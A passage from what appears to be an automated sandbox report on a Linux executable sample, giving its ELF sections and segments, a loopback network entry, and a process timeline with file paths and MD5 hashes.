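              .sbss | NOBITS | 0x452b50 | 0x12b50 | 0x24 | 0x0 | 0x10000003 | WA | 0 | 0 | 4
              .bss | NOBITS | 0x452b80 | 0x12b50 | 0x310 | 0x0 | 0x3 | WA | 0 | 0 | 16
              .mdebug.abi32 | PROGBITS | 0x6d2 | 0x12b50 | 0x0 | 0x0 | 0x0 | | 0 | 0 | 1
              .shstrtab | STRTAB | 0x0 | 0x12b50 | 0x64 | 0x0 | 0x0 | | 0 | 0 | 1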

              Program Segments

              Type | Offset | Virtual Address | Physical Address | File Size | Memory Size | Entropy | Flags | Flags Description | Align | Prog Interpreter | Section Mappings
              LOAD | 0x0 | 0x400000 | 0x400000 | 0x12530 | 0x12530 | 3.5366 | 0x5 | R E | 0x10000 | | .init .text .fini .rodata
              LOAD | 0x12534 | 0x452534 | 0x452534 | 0x61c | 0x95c | 2.4528 | 0x6 | RW | 0x10000 | | .ctors .dtors .data.rel.ro .data .got .sbss .bss
              GNU_STACK | 0x0 | 0x0 | 0x0 | 0x0 | 0x0 | 0.0000 | 0x7 | RWE | 0x4 | |

              Network Behavior

              Network Port Distribution

              TCP Packets

              HTTP Request Dependency Graph

              • 127.0.0.1:52869

              System Behavior

              General

              Start time:01:55:28
              Start date:02/11/2021
              Path:/tmp/KHSQ48GkGn
              Arguments:/tmp/KHSQ48GkGn
              File size:5777432 bytes
              MD5 hash:0083f1f0e77be34ad27f849842bbb00c

              General

              Start time:01:55:28
              Start date:02/11/2021
              Path:/tmp/KHSQ48GkGn
              Arguments:n/a
              File size:5777432 bytes
              MD5 hash:0083f1f0e77be34ad27f849842bbb00c

              General

              Start time:01:55:29
              Start date:02/11/2021
              Path:/tmp/KHSQ48GkGn
              Arguments:n/a
              File size:5777432 bytes
              MD5 hash:0083f1f0e77be34ad27f849842bbb00c

              General

              Start time:01:55:40
              Start date:02/11/2021
              Path:/usr/lib/systemd/systemd
              Arguments:n/a
              File size:1620224 bytes
              MD5 hash:9b2bec7092a40488108543f9334aab75

              General

              Start time:01:55:40
              Start date:02/11/2021
              Path:/usr/sbin/sshd
              Arguments:/usr/sbin/sshd -t
              File size:876328 bytes
              MD5 hash:dbca7a6bbf7bf57fedac243d4b2cb340

              General

              Start time:01:55:40
              Start date:02/11/2021
              Path:/usr/lib/systemd/systemd
              Arguments:n/a
              File size:1620224 bytes
              MD5 hash:9b2bec7092a40488108543f9334aab75

              General

              Start time:01:55:40
              Start date:02/11/2021
              Path:/usr/sbin/sshd
              Arguments:/usr/sbin/sshd -D
              File size:876328 bytes
              MD5 hash:dbca7a6bbf7bf57fedac243d4b2cb340